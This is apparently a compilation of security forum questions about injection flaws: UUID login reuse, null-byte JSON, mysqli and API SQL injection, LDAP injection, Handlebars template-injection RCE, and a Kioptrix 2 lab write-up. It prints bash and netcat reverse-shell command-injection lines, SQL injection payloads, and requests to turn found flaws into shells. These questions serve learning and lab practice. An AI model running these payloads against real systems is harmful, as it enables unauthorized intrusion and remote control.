Stop UUID injection in MYSQL Database

I have a cordova app that logs users in based on their devices model+platform+uuid. For example: Pixel 2Android39798721218. The way this works when a user uses a new device is detailed in the following:

  1. Users opens app
  2. App sends uuid code to checking page like: login-uuid?id=(uuid_here)
  3. If the uuid does not exist in the database the user is directed to a login page with the url: login?uuid=(uuid_here)
  4. User logs in and the uuid is sent to the login backend where it gets stored in a database
  5. When the user opens the app again they are logged in because their uuid is in the database

My question is basically, if someone knows a users login details. They can navigate to login?uuid=foo and then even if the user changes their password the attacker can still login by navigating to login-uuid?id=foo. Is there any way to mitigate this or will simply removing all logged in devices when a user resets there password be enough?

Null byte injection using JSON

I’m trying to make a chatroom for my university, It takes username in JSON, and then stores it in an array, then takes it to DB for keeping logs, but the thing is, that array also has a "status" key, whose value is set to guest my default, but is set to ADMIN if I log in or any member from my team logs in. I know that the idea of storing "status" with username is bad but I just started working on the project. I want to confirm that is it possible to inject NULL byte using username field via JSON and add another key with same name "status" to gain admin privileges??

Having problems with SQL injection with mysqli extension PHP

I am new to SQL injections, and people on Reddit asked me do the portswigger labs. Which I did up till before 2nd order ones. So I am pretty comfortable with usual SQL injections.

Now I have myself made a PHP website using mysqli extensions instead of mysql. So for example, a basic Query execution looks like:

//mysqli// $ result = mysqli_query($ conn, $ qry); instead of $ result = mysql_query($ qry);

========================================================================

So I asked others and found out that without proper sanitization or separate query builders, mysqli extension is as vulnerable as mysql extension. So, the app I made is too basic. It’s just querying the DB and spitting out results. It’s that simple. No sanitization is done.

But executing basic payloads like ‘+or+1=1–+ or anything basic, gives me the error:

mysqli_error() expects exactly 1 parameter, 0 given

So I tried a lot and can’t get past this error for anything I try. I simply can’t execute injections with mysqli extension. Any help is highly appreciated.

Thank You.

How to exploit LDAP injection?

BurpSuite marked a website I am testing with having a potential LDAP injection vulnerability. It seems that when I put an asterisk in a parameter ex. getStuff?id=* I get a 500 error and Java error output. When I set it to something normal like 123 I get a 200 response (the page is just blank however). I’m not sure how I can further exploit this, maybe someone knows?

Kioptrix 2: Why netcat reverse shell executed in web browser via command injection bug doesn’t work?

I’ve completed kioptrix level 2 challenge via bash reverse shell.

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

; bash -i >& /dev/tcp/10.10.13.37/4444 0>&1 

My question is why netcat reverse shell executed in web browser via command injection bug doesn’t work when it was working just fine via terminal?

My Setup

Kali -  10.10.13.37 Kioptrix 2 - 10.10.13.254 

netcat listerner

kali@kali:~$   nc -lp 4444 

I’ve verified tcp port 4444 is open

kali@kali:~$   ss -antp | g 4444 LISTEN 0      1            0.0.0.0:4444         0.0.0.0:*     users:(("nc",pid=3003,fd=3))  kali@kali:~$    

netcat reverse shell executed in web browser via command injection bug doesn’t work

; nc 10.10.13.37 4444 ; nc 10.10.13.37 4444 -e /bin/sh 

No traffic at all

kali@kali:~$   sudo tcpdump -nni eth0 port 4444 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 

However, when I repeat the same process with netcat executed on Kioptrix 2 terminal, I was able to get the reverse shell setup on Kali.

[backdoor@kioptrix ~]$   nc 10.10.13.37 4444 -e /bin/sh 

Reverse shell via terminal is working fine

kali@kali:~$   nc -lp 4444 id uid=502(backdoor) gid=502(backdoor) groups=0(root),10(wheel),500(john),501(harold),502(backdoor) 

tcpdump traffic, the last 4 packets were for id command

kali@kali:~$   sudo tcpdump -nni eth0 port 4444 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 00:58:29.307806 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0 00:58:29.307851 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0 00:58:29.308412 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0  00:59:55.154330 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3 00:59:55.157180 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0 00:59:55.159646 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97 00:59:55.159656 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0 

Handlebars.js 4.1.1 Server Side Template Injection exploitation – running system commands with a Node.js RCE when require() is not available?

I’m currently reading the following article and trying to exploit the vulnerability (Handlebars.js 4.1.1 Server Side Template Injection):

http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html

Sure enough, the proof of concept code works fine. Specifically, the final snippet from Matias works in my setup. However, after all those context changes, I no longer have access to the require keyword, and therefore I cannot do require('child_process').exec(), because it says require is not defined.

I tried looking for global variables in the current context which might help me, but found nothing.

I also considered copying the whole child_process library’s source code into my payload, but that’s not trivial, since the library uses other libraries and some specific variables, which are not initialized for me (primordials, for example).

In order to continue the assignment, I need to get a reverse shell on the target machine. How can I use the RCE to run system commands/get a reverse shell if I cannot use require()?

In SQL injection why don’t we use OR 1 or OR 2>1 instead of OR 1=1?

I read everywhere regarding SQL injection where it is said that if SQL query is SELECT * FROM table_name where username=’xxxxx’ AND password =’xxxx’ and if you want to enter always true condition then you will have to use ‘OR 1=1– then the query will be SELECT * FROM table_name where username=”OR 1=1–‘ AND password =’xxxx’. The logic behind the SQL query is simple since OR 1=1 is always true that is why it has been executed. However 2>1, 3>2 will always be considered true but why don’t we use ‘OR 2>1,’OR 1 expression in SQL injection?

Unable to exploit Sql Injection in the parameter

During my testing I have found a vulnerable parameter in API (/api/v1/documents/?direction=desc&limit=30&mode=reports**&page=1**) and its parameter is page=1 at the end. Upon giving a NULL value &page= in the parameter it returns the following error.

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30, 30) AS `UserDocuments` LEFT OUTER JOIN `tasks` AS `Tasks` ON `UserDocuments' at line 1" 

While if i input ` at the end of value page=1′ it returns the following error

"Undeclared variable: NaN","sql":"SELECT `UserDocuments`.*, `Tasks`.`id` AS `Tasks.id`, `Tasks`.... 

I have the following questions in my mind , i have tried exploiting it but unable to do so. How can i exploit this parameter as it is returning the syntax error. Also if it is not exploitable is it still vulnerable to Sql Injection or some attack ?

Please Note that it is a GET Request and Response is in JSON, while application is developed on PHP.

What does the last single quote of the sql injection query: ‘ or “1”=”1″ ‘ mean

I couldn’t fully grasp why the last single quote of the sql query: ' or "1"="1" ' is necessary. So I understand the part until the last single quote ‘. The first single quote enables to inject the sql and the or "1"="1" part enables the query to always return true. However, I don’t understand why the last single quote is necessary to inject the sql.